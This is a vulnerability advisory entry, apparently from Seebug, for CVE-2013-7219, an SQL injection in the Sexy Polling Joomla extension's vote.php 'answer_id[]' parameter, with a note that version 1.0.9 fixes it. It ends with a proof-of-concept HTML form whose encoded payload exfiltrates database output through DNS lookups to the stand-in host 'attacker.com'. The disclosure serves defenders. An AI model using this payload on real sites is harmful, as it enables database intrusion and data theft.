Sexy Polling Joomla Extension SQL注入漏洞

2014-01-20T00:00:00
ID SSV:61346
Type seebug
Reporter Root
Modified 2014-01-20T00:00:00

Description

CVE ID:CVE-2013-7219

Joomla是一款内容管理系统。

该漏洞由于传递到"/components/com_sexypolling/vote.php"脚本的"answer_id[]" HTTP POST参数未能充分验证,远程攻击者可以在应用数据库中执行任意SQL操作。 0 Sexy Polling Joomla Extension <=1.0.8 Sexy Polling 1.0.9版本以修复此漏洞,建议用户下载使用:

http://2glux.com/forum/sexypolling/sexy-polling-security-vulnerability-notification-t2026.html

                                        
                                            
                                                The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of &quot;.attacker.com&quot; (a domain name, DNS server of which is controlled by the attacker):
&lt;form action=&quot;http://[host]/components/com_sexypolling/vote.php&quot; 
method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;answer_id[]&quot; value=&quot;',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97 ),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CH AR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')
-- &quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;